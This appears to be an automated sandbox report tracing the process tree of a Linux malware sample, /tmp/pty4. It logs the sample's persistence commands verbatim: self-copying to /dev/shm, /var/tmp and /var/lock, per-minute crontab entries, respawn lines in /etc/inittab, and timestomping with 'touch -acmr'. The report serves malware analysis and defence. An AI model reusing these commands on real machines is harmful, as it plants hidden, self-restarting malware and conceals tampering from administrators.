Analysis Process: rm PID: 5244 Parent PID: 5243

General

Start time:	11:26:53
Start date:	23/12/2021
Path:	/usr/bin/rm
Arguments:	rm -rf /etc/inittab2
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Chronological Activities

Analysis Process: pty4 PID: 5245 Parent PID: 5218

General

Start time:	11:26:53
Start date:	23/12/2021
Path:	/tmp/pty4
Arguments:	n/a
File size:	44884 bytes
MD5 hash:	7b4f1c79f1edcb6b36a92debd5a81b96

Chronological Activities

Analysis Process: sh PID: 5245 Parent PID: 5218

General

Start time:	11:26:53
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "touch -acmr /bin/ls /etc/inittab"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5246 Parent PID: 5245

General

Start time:	11:26:53
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: touch PID: 5246 Parent PID: 5245

General

Start time:	11:26:53
Start date:	23/12/2021
Path:	/usr/bin/touch
Arguments:	touch -acmr /bin/ls /etc/inittab
File size:	100728 bytes
MD5 hash:	3859c173f5d3b37be3e531b7c84a9c68

Chronological Activities

Analysis Process: pty4 PID: 5247 Parent PID: 5218

General

Start time:	11:26:53
Start date:	23/12/2021
Path:	/tmp/pty4
Arguments:	n/a
File size:	44884 bytes
MD5 hash:	7b4f1c79f1edcb6b36a92debd5a81b96

Chronological Activities

Analysis Process: pty4 PID: 5249 Parent PID: 5247

General

Start time:	11:26:53
Start date:	23/12/2021
Path:	/tmp/pty4
Arguments:	n/a
File size:	44884 bytes
MD5 hash:	7b4f1c79f1edcb6b36a92debd5a81b96

Chronological Activities

Analysis Process: sh PID: 5249 Parent PID: 5247

General

Start time:	11:26:53
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "cp -f /tmp/pty4 /dev/shm/pty4"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5252 Parent PID: 5249

General

Start time:	11:26:54
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: cp PID: 5252 Parent PID: 5249

General

Start time:	11:26:54
Start date:	23/12/2021
Path:	/usr/bin/cp
Arguments:	cp -f /tmp/pty4 /dev/shm/pty4
File size:	153976 bytes
MD5 hash:	40f10ae7ea3e44218d1a8c306f79c83f

Chronological Activities

Analysis Process: pty4 PID: 5253 Parent PID: 5247

General

Start time:	11:26:54
Start date:	23/12/2021
Path:	/tmp/pty4
Arguments:	n/a
File size:	44884 bytes
MD5 hash:	7b4f1c79f1edcb6b36a92debd5a81b96

Chronological Activities

Analysis Process: pty4 PID: 5255 Parent PID: 5253

General

Start time:	11:26:54
Start date:	23/12/2021
Path:	/tmp/pty4
Arguments:	n/a
File size:	44884 bytes
MD5 hash:	7b4f1c79f1edcb6b36a92debd5a81b96

Chronological Activities

Analysis Process: sh PID: 5255 Parent PID: 5253

General

Start time:	11:26:54
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "crontab -l \| grep /dev/shm/pty4 \| grep -v \"no cron\" \|\| (crontab -l ; echo \"* * * * * /dev/shm/pty4 > /dev/null 2>&1 &\") \| crontab -"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5257 Parent PID: 5255

General

Start time:	11:26:54
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5257 Parent PID: 5255

General

Start time:	11:26:54
Start date:	23/12/2021
Path:	/usr/bin/crontab
Arguments:	crontab -l
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: sh PID: 5259 Parent PID: 5255

General

Start time:	11:26:54
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: grep PID: 5259 Parent PID: 5255

General

Start time:	11:26:54
Start date:	23/12/2021
Path:	/usr/bin/grep
Arguments:	grep /dev/shm/pty4
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Chronological Activities

Analysis Process: sh PID: 5260 Parent PID: 5255

General

Start time:	11:26:54
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: grep PID: 5260 Parent PID: 5255

General

Start time:	11:26:54
Start date:	23/12/2021
Path:	/usr/bin/grep
Arguments:	grep -v "no cron"
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Chronological Activities

Analysis Process: sh PID: 5262 Parent PID: 5255

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5264 Parent PID: 5262

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5264 Parent PID: 5262

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/usr/bin/crontab
Arguments:	crontab -l
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: sh PID: 5263 Parent PID: 5255

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5263 Parent PID: 5255

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/usr/bin/crontab
Arguments:	crontab -
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: pty4 PID: 5254 Parent PID: 5247

General

Start time:	11:26:54
Start date:	23/12/2021
Path:	/tmp/pty4
Arguments:	n/a
File size:	44884 bytes
MD5 hash:	7b4f1c79f1edcb6b36a92debd5a81b96

Chronological Activities

Analysis Process: sh PID: 5254 Parent PID: 5247

General

Start time:	11:26:54
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "cat /etc/inittab \| grep -v \"/dev/shm/pty4\" > /etc/inittab2"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5256 Parent PID: 5254

General

Start time:	11:26:54
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: cat PID: 5256 Parent PID: 5254

General

Start time:	11:26:54
Start date:	23/12/2021
Path:	/usr/bin/cat
Arguments:	cat /etc/inittab
File size:	43416 bytes
MD5 hash:	7e9d213e404ad3bb82e4ebb2e1f2c1b3

Chronological Activities

Analysis Process: sh PID: 5258 Parent PID: 5254

General

Start time:	11:26:54
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: grep PID: 5258 Parent PID: 5254

General

Start time:	11:26:54
Start date:	23/12/2021
Path:	/usr/bin/grep
Arguments:	grep -v /dev/shm/pty4
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Chronological Activities

Analysis Process: pty4 PID: 5261 Parent PID: 5247

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/tmp/pty4
Arguments:	n/a
File size:	44884 bytes
MD5 hash:	7b4f1c79f1edcb6b36a92debd5a81b96

Chronological Activities

Analysis Process: sh PID: 5261 Parent PID: 5247

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "echo \"0:2345:respawn:/dev/shm/pty4\" >> /etc/inittab2"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: pty4 PID: 5265 Parent PID: 5247

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/tmp/pty4
Arguments:	n/a
File size:	44884 bytes
MD5 hash:	7b4f1c79f1edcb6b36a92debd5a81b96

Chronological Activities

Analysis Process: sh PID: 5265 Parent PID: 5247

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "cat /etc/inittab2 > /etc/inittab"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5266 Parent PID: 5265

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: cat PID: 5266 Parent PID: 5265

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/usr/bin/cat
Arguments:	cat /etc/inittab2
File size:	43416 bytes
MD5 hash:	7e9d213e404ad3bb82e4ebb2e1f2c1b3

Chronological Activities

Analysis Process: pty4 PID: 5267 Parent PID: 5247

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/tmp/pty4
Arguments:	n/a
File size:	44884 bytes
MD5 hash:	7b4f1c79f1edcb6b36a92debd5a81b96

Chronological Activities

Analysis Process: sh PID: 5267 Parent PID: 5247

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "rm -rf /etc/inittab2"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5268 Parent PID: 5267

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: rm PID: 5268 Parent PID: 5267

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/usr/bin/rm
Arguments:	rm -rf /etc/inittab2
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Chronological Activities

Analysis Process: pty4 PID: 5269 Parent PID: 5247

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/tmp/pty4
Arguments:	n/a
File size:	44884 bytes
MD5 hash:	7b4f1c79f1edcb6b36a92debd5a81b96

Chronological Activities

Analysis Process: sh PID: 5269 Parent PID: 5247

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "touch -acmr /bin/ls /etc/inittab"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5270 Parent PID: 5269

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: touch PID: 5270 Parent PID: 5269

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/usr/bin/touch
Arguments:	touch -acmr /bin/ls /etc/inittab
File size:	100728 bytes
MD5 hash:	3859c173f5d3b37be3e531b7c84a9c68

Chronological Activities

Analysis Process: pty4 PID: 5271 Parent PID: 5247

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/tmp/pty4
Arguments:	n/a
File size:	44884 bytes
MD5 hash:	7b4f1c79f1edcb6b36a92debd5a81b96

Chronological Activities

Analysis Process: sh PID: 5271 Parent PID: 5247

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "cp -f /tmp/pty4 /var/tmp/pty4"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5272 Parent PID: 5271

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: cp PID: 5272 Parent PID: 5271

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/usr/bin/cp
Arguments:	cp -f /tmp/pty4 /var/tmp/pty4
File size:	153976 bytes
MD5 hash:	40f10ae7ea3e44218d1a8c306f79c83f

Chronological Activities

Analysis Process: pty4 PID: 5273 Parent PID: 5247

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/tmp/pty4
Arguments:	n/a
File size:	44884 bytes
MD5 hash:	7b4f1c79f1edcb6b36a92debd5a81b96

Chronological Activities

Analysis Process: pty4 PID: 5275 Parent PID: 5273

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/tmp/pty4
Arguments:	n/a
File size:	44884 bytes
MD5 hash:	7b4f1c79f1edcb6b36a92debd5a81b96

Chronological Activities

Analysis Process: sh PID: 5275 Parent PID: 5273

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "crontab -l \| grep /var/tmp/pty4 \| grep -v \"no cron\" \|\| (crontab -l ; echo \"* * * * * /var/tmp/pty4 > /dev/null 2>&1 &\") \| crontab -"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5278 Parent PID: 5275

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5278 Parent PID: 5275

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/usr/bin/crontab
Arguments:	crontab -l
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: sh PID: 5279 Parent PID: 5275

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: grep PID: 5279 Parent PID: 5275

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/usr/bin/grep
Arguments:	grep /var/tmp/pty4
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Chronological Activities

Analysis Process: sh PID: 5280 Parent PID: 5275

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: grep PID: 5280 Parent PID: 5275

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/usr/bin/grep
Arguments:	grep -v "no cron"
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Chronological Activities

Analysis Process: sh PID: 5282 Parent PID: 5275

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5284 Parent PID: 5282

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5284 Parent PID: 5282

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/usr/bin/crontab
Arguments:	crontab -l
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: sh PID: 5283 Parent PID: 5275

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5283 Parent PID: 5275

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/usr/bin/crontab
Arguments:	crontab -
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: pty4 PID: 5274 Parent PID: 5247

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/tmp/pty4
Arguments:	n/a
File size:	44884 bytes
MD5 hash:	7b4f1c79f1edcb6b36a92debd5a81b96

Chronological Activities

Analysis Process: sh PID: 5274 Parent PID: 5247

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "cat /etc/inittab \| grep -v \"/var/tmp/pty4\" > /etc/inittab2"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5276 Parent PID: 5274

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: cat PID: 5276 Parent PID: 5274

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/usr/bin/cat
Arguments:	cat /etc/inittab
File size:	43416 bytes
MD5 hash:	7e9d213e404ad3bb82e4ebb2e1f2c1b3

Chronological Activities

Analysis Process: sh PID: 5277 Parent PID: 5274

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: grep PID: 5277 Parent PID: 5274

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/usr/bin/grep
Arguments:	grep -v /var/tmp/pty4
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Chronological Activities

Analysis Process: pty4 PID: 5281 Parent PID: 5247

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/tmp/pty4
Arguments:	n/a
File size:	44884 bytes
MD5 hash:	7b4f1c79f1edcb6b36a92debd5a81b96

Chronological Activities

Analysis Process: sh PID: 5281 Parent PID: 5247

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "echo \"0:2345:respawn:/var/tmp/pty4\" >> /etc/inittab2"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: pty4 PID: 5285 Parent PID: 5247

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/tmp/pty4
Arguments:	n/a
File size:	44884 bytes
MD5 hash:	7b4f1c79f1edcb6b36a92debd5a81b96

Chronological Activities

Analysis Process: sh PID: 5285 Parent PID: 5247

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "cat /etc/inittab2 > /etc/inittab"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5286 Parent PID: 5285

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: cat PID: 5286 Parent PID: 5285

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/usr/bin/cat
Arguments:	cat /etc/inittab2
File size:	43416 bytes
MD5 hash:	7e9d213e404ad3bb82e4ebb2e1f2c1b3

Chronological Activities

Analysis Process: pty4 PID: 5287 Parent PID: 5247

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/tmp/pty4
Arguments:	n/a
File size:	44884 bytes
MD5 hash:	7b4f1c79f1edcb6b36a92debd5a81b96

Chronological Activities

Analysis Process: sh PID: 5287 Parent PID: 5247

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "rm -rf /etc/inittab2"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5288 Parent PID: 5287

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: rm PID: 5288 Parent PID: 5287

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/usr/bin/rm
Arguments:	rm -rf /etc/inittab2
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Chronological Activities

Analysis Process: pty4 PID: 5289 Parent PID: 5247

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/tmp/pty4
Arguments:	n/a
File size:	44884 bytes
MD5 hash:	7b4f1c79f1edcb6b36a92debd5a81b96

Chronological Activities

Analysis Process: sh PID: 5289 Parent PID: 5247

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "touch -acmr /bin/ls /etc/inittab"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5290 Parent PID: 5289

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: touch PID: 5290 Parent PID: 5289

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/usr/bin/touch
Arguments:	touch -acmr /bin/ls /etc/inittab
File size:	100728 bytes
MD5 hash:	3859c173f5d3b37be3e531b7c84a9c68

Chronological Activities

Analysis Process: pty4 PID: 5291 Parent PID: 5247

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/tmp/pty4
Arguments:	n/a
File size:	44884 bytes
MD5 hash:	7b4f1c79f1edcb6b36a92debd5a81b96

Chronological Activities

Analysis Process: sh PID: 5291 Parent PID: 5247

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "cp -f /tmp/pty4 /var/lock/pty4"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5292 Parent PID: 5291

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: cp PID: 5292 Parent PID: 5291

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/usr/bin/cp
Arguments:	cp -f /tmp/pty4 /var/lock/pty4
File size:	153976 bytes
MD5 hash:	40f10ae7ea3e44218d1a8c306f79c83f

Chronological Activities

Analysis Process: pty4 PID: 5293 Parent PID: 5247

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/tmp/pty4
Arguments:	n/a
File size:	44884 bytes
MD5 hash:	7b4f1c79f1edcb6b36a92debd5a81b96

Chronological Activities

Analysis Process: pty4 PID: 5295 Parent PID: 5293

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/tmp/pty4
Arguments:	n/a
File size:	44884 bytes
MD5 hash:	7b4f1c79f1edcb6b36a92debd5a81b96

Chronological Activities

Analysis Process: sh PID: 5295 Parent PID: 5293

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "crontab -l \| grep /var/lock/pty4 \| grep -v \"no cron\" \|\| (crontab -l ; echo \"* * * * * /var/lock/pty4 > /dev/null 2>&1 &\") \| crontab -"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5298 Parent PID: 5295

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5298 Parent PID: 5295

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/usr/bin/crontab
Arguments:	crontab -l
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: sh PID: 5299 Parent PID: 5295

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: grep PID: 5299 Parent PID: 5295

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/usr/bin/grep
Arguments:	grep /var/lock/pty4
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Chronological Activities

Analysis Process: sh PID: 5300 Parent PID: 5295

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: grep PID: 5300 Parent PID: 5295

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/usr/bin/grep
Arguments:	grep -v "no cron"
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Chronological Activities

Analysis Process: sh PID: 5303 Parent PID: 5295

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5305 Parent PID: 5303

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5305 Parent PID: 5303

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/usr/bin/crontab
Arguments:	crontab -l
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: sh PID: 5304 Parent PID: 5295

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5304 Parent PID: 5295

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/usr/bin/crontab
Arguments:	crontab -
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: pty4 PID: 5294 Parent PID: 5247

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/tmp/pty4
Arguments:	n/a
File size:	44884 bytes
MD5 hash:	7b4f1c79f1edcb6b36a92debd5a81b96

Chronological Activities

Analysis Process: sh PID: 5294 Parent PID: 5247

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "cat /etc/inittab \| grep -v \"/var/lock/pty4\" > /etc/inittab2"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5296 Parent PID: 5294

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: cat PID: 5296 Parent PID: 5294

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/usr/bin/cat
Arguments:	cat /etc/inittab
File size:	43416 bytes
MD5 hash:	7e9d213e404ad3bb82e4ebb2e1f2c1b3

Chronological Activities

Analysis Process: sh PID: 5297 Parent PID: 5294

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: grep PID: 5297 Parent PID: 5294

General

Start time:	11:26:55
Start date:	23/12/2021
Path:	/usr/bin/grep
Arguments:	grep -v /var/lock/pty4
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Chronological Activities

Analysis Process: pty4 PID: 5301 Parent PID: 5247

General

Start time:	11:26:56
Start date:	23/12/2021
Path:	/tmp/pty4
Arguments:	n/a
File size:	44884 bytes
MD5 hash:	7b4f1c79f1edcb6b36a92debd5a81b96

Chronological Activities

Analysis Process: sh PID: 5301 Parent PID: 5247

General

Start time:	11:26:56
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "echo \"0:2345:respawn:/var/lock/pty4\" >> /etc/inittab2"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: pty4 PID: 5302 Parent PID: 5247

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/tmp/pty4
Arguments:	n/a
File size:	44884 bytes
MD5 hash:	7b4f1c79f1edcb6b36a92debd5a81b96

Chronological Activities

Analysis Process: sh PID: 5302 Parent PID: 5247

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "cat /etc/inittab2 > /etc/inittab"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5306 Parent PID: 5302

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: cat PID: 5306 Parent PID: 5302

General

Start time:	11:26:57
Start date:	23/12/2021
Path:	/usr/bin/cat
Arguments:	cat /etc/inittab2
File size:	43416 bytes
MD5 hash:	7e9d213e404ad3bb82e4ebb2e1f2c1b3

Chronological Activities

